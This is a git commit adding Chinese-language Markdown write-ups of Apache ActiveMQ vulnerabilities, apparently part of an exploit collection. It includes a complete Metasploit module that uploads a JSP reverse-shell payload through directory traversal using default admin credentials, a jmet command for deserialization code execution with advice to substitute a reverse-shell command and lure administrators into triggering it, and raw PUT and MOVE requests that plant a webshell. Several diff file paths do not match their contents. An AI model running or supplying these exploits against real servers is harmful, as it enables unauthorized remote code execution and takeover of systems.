add active MQ exp

Author: helloexp

02-ActiveMQ/ActiveMQ物理路径泄漏漏洞/ActiveMQ物理路径泄漏漏洞.md

@@ -0,0 +1,19 @@
+ActiveMQ物理路径泄漏漏洞
+========================
+
+一、漏洞简介
+------------
+
+ActiveMQ默认开启PUT请求，当开启PUT时，构造好Payload(即不存在的目录)，Response会返回相应的物理路径信息
+
+二、漏洞影响
+------------
+
+三、复现过程
+------------
+
+    Request Raw:
+    PUT /fileserver/a../../%08/..%08/.%08/%08 HTTP/1.1
+    Host: 192.168.197.25:8161
+    Authorization: Basic YWRtaW46YWRtaW4=
+    Content-Length: 4

02-ActiveMQ/（CVE-2015-1830）ActiveMQ 路径遍历导致未经身份验证的rce/（CVE-2015-1830）ActiveMQ 路径遍历导致未经身份验证的rce.md

@@ -0,0 +1,150 @@
+（CVE-2015-1830）ActiveMQ 路径遍历导致未经身份验证的rce
+=======================================================
+
+一、漏洞简介
+------------
+
+Windows 5.11.2之前的Apache ActiveMQ
+5.x中blob消息的文件服务器上载/下载功能中的目录遍历漏洞允许远程攻击者通过未指定的向量在任意目录中创建JSP文件。
+
+二、漏洞影响
+------------
+
+ActiveMQ 5.11.1
+
+三、复现过程
+------------
+
+### msf poc
+
+> 直接在msf里面搜索就行了，如果没有请更新msf版本，或者手动复制下面的脚本到msf目录下。
+
+    ##
+    # This module requires Metasploit: https://metasploit.com/download
+    # Current source: https://github.com/rapid7/metasploit-framework
+    ##
+
+    class MetasploitModule < Msf::Exploit::Remote
+      Rank = ExcellentRanking
+
+      include Msf::Exploit::Remote::HttpClient
+
+      def initialize(info = {})
+        super(update_info(info,
+          'Name'           => 'Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload',
+          'Description'    => %q{
+            This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache
+            ActiveMQ 5.x before 5.11.2 for Windows.
+
+            The module tries to upload a JSP payload to the /admin directory via the traversal
+            path /fileserver/..\\admin\\ using an HTTP PUT request with the default ActiveMQ
+            credentials admin:admin (or other credentials provided by the user). It then issues
+            an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the
+            payload and obtain a shell.
+          },
+          'Author'          =>
+            [
+              'David Jorm',     # Discovery and exploit
+              'Erik Wynter'     # @wyntererik - Metasploit
+            ],
+          'References'     =>
+            [
+              [ 'CVE', '2015-1830' ],
+              [ 'EDB', '40857'],
+              [ 'URL', 'https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt' ]
+            ],
+          'Privileged'     => false,
+          'Platform'    => %w{ win },
+          'Targets'     =>
+            [
+              [ 'Windows Java',
+                {
+                  'Arch' => ARCH_JAVA,
+                  'Platform' => 'win'
+                }
+              ],
+            ],
+          'DisclosureDate' => '2015-08-19',
+          'License'        => MSF_LICENSE,
+          'DefaultOptions'  => {
+            'RPORT' => 8161,
+            'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
+            },
+          'DefaultTarget'  => 0))
+
+        register_options([
+          OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
+          OptString.new('PATH',      [true, 'Traversal path', '/fileserver/..\\admin\\']),
+          OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
+          OptString.new('PASSWORD', [true, 'Password to authenticate with', 'admin'])
+        ])
+      end
+
+      def check
+        print_status("Running check...")
+        testfile = Rex::Text::rand_text_alpha(10)
+        testcontent = Rex::Text::rand_text_alpha(10)
+
+        send_request_cgi({
+          'uri'       => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"),
+          'headers'     => {
+            'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+            },
+          'method'    => 'PUT',
+          'data'      => "<% out.println(\"#{testcontent}\");%>"
+        })
+
+        res1 = send_request_cgi({
+          'uri'       => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"),
+          'headers'     => {
+            'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+            },
+          'method'    => 'GET'
+        })
+
+        if res1 && res1.body.include?(testcontent)
+          send_request_cgi(
+            opts = {
+              'uri'       => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"),
+              'headers'     => {
+                'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+                },
+              'method'    => 'DELETE'
+            },
+            timeout = 1
+          )
+          return Exploit::CheckCode::Vulnerable
+        end
+
+        Exploit::CheckCode::Safe
+      end
+
+      def exploit
+        print_status("Uploading payload...")
+        testfile = Rex::Text::rand_text_alpha(10)
+        vprint_status("If upload succeeds, payload will be available at #{target_uri.path}admin/#{testfile}.jsp") #This information is provided to allow for manual execution of the payload in case the upload is successful but the GET request issued by the module fails.
+
+        send_request_cgi({
+          'uri'       => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"),
+          'headers'     => {
+            'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+            },
+          'method'    => 'PUT',
+          'data'      => payload.encoded
+        })
+
+        print_status("Payload sent. Attempting to execute the payload.")
+        res = send_request_cgi({
+          'uri'       => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"),
+          'headers'     => {
+            'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+          },
+          'method'    => 'GET'
+        })
+        if res && res.code == 200
+          print_good("Payload executed!")
+        else
+          fail_with(Failure::PayloadFailed, "Failed to execute the payload")
+        end
+      end
+    end

02-ActiveMQ/（CVE-2015-5254）ActiveMQ 反序列化漏洞/resource/(CVE-2015-5254)ActiveMQ反序列化漏洞/media/rId25.png

@@ -0,0 +1,54 @@
+（CVE-2015-5254）ActiveMQ 反序列化漏洞
+======================================
+
+一、漏洞简介
+------------
+
+Apache ActiveMQ
+5.13.0之前5.x版本中存在安全漏洞，该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java
+Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。
+
+二、漏洞影响
+------------
+
+Apache ActiveMQ 5.13.0之前的5.x版本
+
+三、复现过程
+------------
+
+漏洞利用过程如下：
+
+1.  构造（可以使用ysoserial）可执行命令的序列化对象
+
+2.  作为一个消息，发送给目标61616端口
+
+3.  访问web管理页面，读取消息，触发漏洞
+
+使用[jmet](https://github.com/ianxtianxt/jmet)进行漏洞利用。首先下载jmet的jar文件，并在同目录下创建一个external文件夹（否则可能会爆文件夹不存在的错误）。
+
+jmet原理是使用ysoserial生成Payload并发送（其jar内自带ysoserial，无需再自己下载），所以我们需要在ysoserial是gadget中选择一个可以使用的，比如ROME。
+
+执行：
+
+    java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616
+
+![](./resource/(CVE-2015-5254)ActiveMQ反序列化漏洞/media/rId25.png)
+
+此时会给目标ActiveMQ添加一个名为event的队列，我们可以通过`http://your-ip:8161/admin/browse.jsp?JMSDestination=event`看到这个队列中所有消息：
+
+![](./resource/(CVE-2015-5254)ActiveMQ反序列化漏洞/media/rId26.png)
+
+点击查看这条消息即可触发命令执行，此时进入容器`docker-compose exec activemq bash`，可见/tmp/success已成功创建，说明漏洞利用成功：
+
+![](./resource/(CVE-2015-5254)ActiveMQ反序列化漏洞/media/rId27.png)
+
+将命令替换成弹shell语句再利用：
+
+![](./resource/(CVE-2015-5254)ActiveMQ反序列化漏洞/media/rId28.png)
+
+值得注意的是，通过web管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下，我们可以诱导管理员访问我们的链接以触发，或者伪装成其他合法服务需要的消息，等待客户端访问的时候触发。
+
+参考链接
+--------
+
+> https://vulhub.org/\#/environments/activemq/CVE-2015-5254/

02-ActiveMQ/（CVE-2015-5254）ActiveMQ 反序列化漏洞/resource/(CVE-2015-5254)ActiveMQ反序列化漏洞/media/rId26.png

@@ -0,0 +1,67 @@
+（CVE-2016-3088）ActiveMQ应用漏洞
+=================================
+
+一、漏洞简介
+------------
+
+ActiveMQ是一款流行的开源消息服务器。默认情况下，ActiveMQ服务是没有配置安全参数。恶意人员可以利用默认配置弱点发动远程命令执行攻击，获取服务器权限，从而导致数据泄露。
+
+二、漏洞影响
+------------
+
+Apache ActiveMQ 5.x \~ 5.14.0
+
+三、复现过程
+------------
+
+漏洞是需要登录之后才可以执行
+
+漏洞利用就是/fileserver/有put上传权限，/admin/有执行权限，可找到绝对路径，使用move移动文件到/admin/
+
+下面就是两步走，先是利用put上传文件到/fileserver/,然后移动到move到admin下面
+
+所有返回为204就代表是成功，有个坑点：不要put同文件名的文件上去
+
+如果上传不解析的话，则是证明没有权限！！！
+
+如果上传不解析的话，则是证明没有权限！！！
+
+如果上传不解析的话，则是证明没有权限！！！
+
+ActiveMQ默认开启PUT方法，当fileserver存在时我们可以上传jspwebshell。
+
+![](./resource/(CVE-2016-3088)ActiveMQ应用漏洞/media/rId24.png)
+
+    PUT /fileserver/shell.jsp HTTP/1.1
+    Host: 192.168.197.25:8161
+    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
+    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+    Accept-Encoding: gzip, deflate
+    Connection: keep-alive
+    Upgrade-Insecure-Requests: 1
+    Authorization: Basic YWRtaW46YWRtaW4=
+
+    shell
+
+利用 MOVE 方法将 Webshell 移入 admin/ 目录
+
+![](./resource/(CVE-2016-3088)ActiveMQ应用漏洞/media/rId25.png)
+
+    Request Raw:
+    MOVE /fileserver/shell.jsp HTTP/1.1
+    Destination:file:/data/apache-activemq-5.7.0/webapps/admin/shell.jsp
+    Host: 192.168.197.25:8161
+    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
+    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+    Accept-Encoding: gzip, deflate
+    Connection: keep-alive
+    Upgrade-Insecure-Requests: 1
+    Authorization: Basic YWRtaW46YWRtaW4=
+    Content-Length: 17
+    Content-Length: 0
+
+    shell
+
+![](./resource/(CVE-2016-3088)ActiveMQ应用漏洞/media/rId26.png)

02-ActiveMQ/（CVE-2015-5254）ActiveMQ 反序列化漏洞/resource/(CVE-2015-5254)ActiveMQ反序列化漏洞/media/rId27.png

@@ -0,0 +1,20 @@
+（CVE-2017-15709）ActiveMQ 信息泄漏漏洞
+=======================================
+
+一、漏洞简介
+------------
+
+Apache
+ActiveMQ默认消息队列61616端口对外，61616端口使用了OpenWire协议，这个端口会暴露服务器相关信息，这些相关信息实际上是debug信息。
+
+会返回应用名称，JVM，操作系统以及内核版本等信息。
+
+二、漏洞影响
+------------
+
+apache-activemq-5.15.0 to apache-activemq-5.15.2apache-activemq-5.14.0 to apache-activemq-5.14.5
+
+三、复现过程
+------------
+
+![](./resource/(CVE-2017-15709)ActiveMQ信息泄漏漏洞/media/rId24.png)